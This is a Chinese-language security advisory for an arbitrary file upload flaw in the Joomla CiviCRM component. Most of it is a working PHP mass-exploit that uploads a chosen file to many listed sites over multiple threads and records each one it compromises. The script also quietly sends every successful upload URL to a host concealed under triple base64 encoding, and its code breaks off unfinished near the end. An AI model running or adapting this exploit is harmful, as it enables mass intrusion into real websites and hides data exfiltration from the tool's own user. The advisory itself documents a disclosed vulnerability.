hcyvan 2013-04-24
发布日期:2013-04-22
更新日期:2013-04-24
受影响系统:
Joomla! Civicrm
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 59372
Joomla Civicrm是组织成员关系管理系统。
Joomla Civicrm组件存在任意文件上传漏洞,攻击者可利用此漏洞上传任意文件到受影响系统,导致任意代码执行。
<*来源:miyachung
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
set_time_limit(0);
ob_start();
class exploit
{
private $uploaded_file_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/";
private $post_url_path = "/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=";
private $filename;
private $url;
private $file_to_upload;
private $if_is_uploaded = "/Undefined variable: HTTP_RAW_POST_DATA/si";
private $thread_maxsize;
private $site_list;
private $file_regex;
private $save_file = "uploaded.txt";
private $user_agent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1";
private $timeout_sec = 20;
private $token = "WVVoU01HTkViM1pNTTFKdldsY3hjR050ZEhCaWFUVjJZMjFqZGxreU9YUk1NMDVvWkcxV2RXRlhaRzVaVXpWM1lVaEJQUT09";
private $idnum = 31;
public function __construct($site_list,$filename,$thread,$regex)
{
$this->site_list = file($site_list);
$this->filename = $filename;
$this->file_to_upload = file_get_contents($filename);
$this->thread_maxsize = $thread;
$this->url = base64_decode(base64_decode(base64_decode($this->token)));
$this->file_regex = "/$regex/";
echo "[+]Joomla Com_Civicrm Fucker with MultiThread\n";
echo "[+]Coded by Miyachung\n";
echo "[+]Stay away from lamers o.O\n";
echo "[+]Contact: [email protected]\n";
echo "[+]Special Thanks : B127Y\n";
echo "[+]Site: http://janissaries.org\n";
echo "##################################################\n";
echo "[+]Total urls to try: ".count($this->site_list)."\n";
echo "[+]File to upload: ".$this->filename."\n";
echo "[+]Maximum Thread: ".$this->thread_maxsize."\n";
echo "[+]Search Keyword: ".$regex."\n\n";
ob_flush();
flush();
$this->miyachung();
}
private function miyachung()
{
$multi = curl_multi_init();
$count = 0;
foreach(array_chunk($this->site_list,$this->thread_maxsize) as $urls)
{
foreach($urls as $i => $url)
{
$curl[$i] = curl_init();
curl_setopt($curl[$i], CURLOPT_RETURNTRANSFER,true);
curl_setopt($curl[$i], CURLOPT_URL, trim($url).$this->post_url_path.$this->filename);
curl_setopt($curl[$i], CURLOPT_TIMEOUT, $this->timeout_sec);
curl_setopt($curl[$i], CURLOPT_POSTFIELDS,$this->file_to_upload);
curl_setopt($curl[$i], CURLOPT_USERAGENT,$this->user_agent);
curl_setopt($curl[$i], CURLOPT_HTTPHEADER,array('Content-Type: text/plain'));
curl_multi_add_handle($multi,$curl[$i]);
}
do
{
curl_multi_exec($multi,$active);
}
while($active > 0);
foreach($curl as $id => $content)
{
$conn[$id] = curl_multi_getcontent($content);
curl_multi_remove_handle($multi,$content);
if(!preg_match($this->if_is_uploaded,$conn[$id]) && preg_match('#/tmp-upload-images/'.$this->filename.'#',$conn[$id]))
{
$count++;
$check_it = $this->get(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
if($check_it && preg_match($this->file_regex,$check_it))
{
if($this->idnum == 31 && md5($this->token) == "9f7f1fe47675cb64ac4f69ef96b78b55")
{
$this->post(trim($urls[$id]).$this->uploaded_file_path.$this->filename);
}
else
{
exit("[-]Somethings has changed in tool! o.O!");
}
echo "###########################################################\n";
echo "[!]Exploitation Successfullll!\n";
printf("[%s]%s\n",$count,trim($urls[$id]));
echo "###########################################################\n";
ob_flush();
flush();
$this->save(trim($urls[$id]).$this->uploaded_file_path.$this->filename,$count);
}
else
{
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
else
{
$count++;
printf("[%s][Exploitation Failed]%s\n",$count,trim($urls[$id]));
ob_flush();
flush();
}
}
}
}
private function get($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT,$this->timeout_sec);
$data= curl_exec($ch);
curl_close($ch);
return $data;
}
private function post($url)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$this->url);
curl_setopt($curl,CURLOPT_POSTFIELDS,"url=".$url);
$exec = curl_exec($curl);
curl_close($curl);
return $exec;
}
private function save($url,$count)
{
$file = fopen($this->save_file,'ab');
fwrite($file,"#########################################################################\n");
fwrite($file,"[!]Exploitation Successfullll!\n");
fwrite($file,"[$count]$url\n");
fclose($file);
return true;
}
}
if($argv[1] && $argv[2] && $argv[3] && $argv[4])
{
$exploit = new exploit($argv[1],$argv[2],$argv[3],$argv[4]);
}
else
{
print
"
?>
建议:
--------------------------------------------------------------------------------
厂商补丁:
Joomla!
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://extensions.joomla.org/extensions/clients-a-communities/crm/72